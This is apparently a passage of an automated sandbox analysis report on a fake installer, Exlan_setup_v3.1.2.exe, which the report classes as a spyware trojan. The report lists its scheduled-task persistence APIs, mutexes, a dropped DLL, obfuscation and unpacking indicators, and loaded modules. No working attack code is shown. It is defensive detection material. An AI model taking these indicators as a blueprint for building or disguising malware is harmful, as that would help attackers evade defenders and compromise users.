Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0041E490	1_2_0041E490
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00425C90	1_2_00425C90
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0041DD40	1_2_0041DD40
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00429514	1_2_00429514
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_004185C3	1_2_004185C3
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0041AD90	1_2_0041AD90
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00436DB0	1_2_00436DB0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00414670	1_2_00414670
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0043D610	1_2_0043D610
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00427626	1_2_00427626
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00406630	1_2_00406630
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0041CE84	1_2_0041CE84
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00418E90	1_2_00418E90
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0043D6A0	1_2_0043D6A0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_004226B0	1_2_004226B0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00426740	1_2_00426740
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0043D740	1_2_0043D740
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00434762	1_2_00434762
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00411764	1_2_00411764
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0042BE6A	1_2_0042BE6A
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00415FF5	1_2_00415FF5
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00402F10	1_2_00402F10
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0041D71C	1_2_0041D71C
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0041BF29	1_2_0041BF29
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00416FE6	1_2_00416FE6
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00408FF0	1_2_00408FF0
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00415FF5	1_2_00415FF5
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_00408780	1_2_00408780

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: String function: 00414660 appears 59 times
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: String function: 6D0090D8 appears 32 times
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: String function: 00407FA0 appears 42 times

Source: Exlan_setup_v3.1.2.exe, 00000000.00000000.1661273647.0000000000C6E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesetup.exe, vs Exlan_setup_v3.1.2.exe
Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1694157417.0000000005EC0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameKocjkxx.dll" vs Exlan_setup_v3.1.2.exe
Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1690736705.0000000004497000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameKocjkxx.dll" vs Exlan_setup_v3.1.2.exe
Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1695220822.00000000061B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Exlan_setup_v3.1.2.exe
Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1674099835.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Exlan_setup_v3.1.2.exe
Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1672977051.000000000128E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Exlan_setup_v3.1.2.exe
Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1692574767.00000000057E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameProtect.dll8 vs Exlan_setup_v3.1.2.exe
Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1695672104.0000000006430000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Exlan_setup_v3.1.2.exe
Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1690736705.0000000004348000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Exlan_setup_v3.1.2.exe
Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1690736705.0000000004348000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Exlan_setup_v3.1.2.exe
Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1690736705.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Exlan_setup_v3.1.2.exe
Source: Exlan_setup_v3.1.2.exe	Binary or memory string: OriginalFilenamesetup.exe, vs Exlan_setup_v3.1.2.exe

Source: Exlan_setup_v3.1.2.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.Exlan_setup_v3.1.2.exe.41d5570.1.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.Exlan_setup_v3.1.2.exe.41d5570.1.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.Exlan_setup_v3.1.2.exe.41d5570.1.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.Exlan_setup_v3.1.2.exe.41d5570.1.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.Exlan_setup_v3.1.2.exe.4416a20.0.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.Exlan_setup_v3.1.2.exe.4416a20.0.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 0.2.Exlan_setup_v3.1.2.exe.4416a20.0.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Exlan_setup_v3.1.2.exe.41d5570.1.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.Exlan_setup_v3.1.2.exe.6430000.7.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.Exlan_setup_v3.1.2.exe.41d5570.1.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.Exlan_setup_v3.1.2.exe.41d5570.1.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.Exlan_setup_v3.1.2.exe.6430000.7.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Exlan_setup_v3.1.2.exe.41d5570.1.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Exlan_setup_v3.1.2.exe.6430000.7.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Exlan_setup_v3.1.2.exe.41d5570.1.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: Exlan_setup_v3.1.2.exe, -Module-.cs	Security API names: mutex.SetAccessControl
Source: Exlan_setup_v3.1.2.exe, -Module-.cs	Security API names: val.AddAccessRule
Source: 0.2.Exlan_setup_v3.1.2.exe.4416a20.0.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Exlan_setup_v3.1.2.exe.4416a20.0.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Exlan_setup_v3.1.2.exe.6430000.7.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Exlan_setup_v3.1.2.exe.4416a20.0.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.Exlan_setup_v3.1.2.exe.41d5570.1.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Exlan_setup_v3.1.2.exe.6430000.7.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.Exlan_setup_v3.1.2.exe.6430000.7.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.Exlan_setup_v3.1.2.exe.4416a20.0.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.Exlan_setup_v3.1.2.exe.4416a20.0.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@12/2

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

Code function: 1_2_00437920 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

1_2_00437920

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Mutant created: \Sessions\1\BaseNamedObjects\Umxyzpiueq
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Protect544cd51a.dll

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

File created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

Jump to behavior

Source: Exlan_setup_v3.1.2.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Exlan_setup_v3.1.2.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.87%

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

File read: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe "C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe"
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process created: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe "C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe"
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process created: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe "C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Exlan_setup_v3.1.2.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Exlan_setup_v3.1.2.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Exlan_setup_v3.1.2.exe

Static file information: File size 5136896 > 1048576

Source: Exlan_setup_v3.1.2.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x4d7c00

Source: Exlan_setup_v3.1.2.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: Exlan_setup_v3.1.2.exe, Protect544cd51a.dll.0.dr
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1695672104.0000000006430000.00000004.08000000.00040000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000000.00000002.1690736705.0000000004348000.00000004.00000800.00020000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000000.00000002.1690736705.00000000041D1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1695672104.0000000006430000.00000004.08000000.00040000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000000.00000002.1690736705.0000000004348000.00000004.00000800.00020000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000000.00000002.1690736705.00000000041D1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1695220822.00000000061B0000.00000004.08000000.00040000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000000.00000002.1690736705.0000000004348000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1695220822.00000000061B0000.00000004.08000000.00040000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000000.00000002.1690736705.0000000004348000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: Exlan_setup_v3.1.2.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: Exlan_setup_v3.1.2.exe, IntegratedAggregator.cs	.Net Code: MergeFinalizer
Source: 0.2.Exlan_setup_v3.1.2.exe.41d5570.1.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Exlan_setup_v3.1.2.exe.41d5570.1.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Exlan_setup_v3.1.2.exe.41d5570.1.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.Exlan_setup_v3.1.2.exe.4416a20.0.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Exlan_setup_v3.1.2.exe.4416a20.0.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Exlan_setup_v3.1.2.exe.4416a20.0.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.Exlan_setup_v3.1.2.exe.6430000.7.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Exlan_setup_v3.1.2.exe.6430000.7.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Exlan_setup_v3.1.2.exe.6430000.7.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.Exlan_setup_v3.1.2.exe.6110000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1694937344.0000000006110000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1674099835.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Exlan_setup_v3.1.2.exe PID: 7556, type: MEMORYSTR

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

Code function: 0_2_6CFBB6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,

0_2_6CFBB6C0

Source: Exlan_setup_v3.1.2.exe

Static PE information: real checksum: 0x12f31f6 should be: 0x4ee622

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 0_2_6D00D565 push ecx; ret	0_2_6D00D578
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 0_2_6D00CC2B push ecx; ret	0_2_6D00CC3E
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0043A980 push eax; mov dword ptr [esp], 6A6B6C6Dh	1_2_0043A98E
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_0043D3B0 push eax; mov dword ptr [esp], 666564B3h	1_2_0043D3B1
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 1_2_004464CB push E360D4A8h; iretd	1_2_004464D9

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

File created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
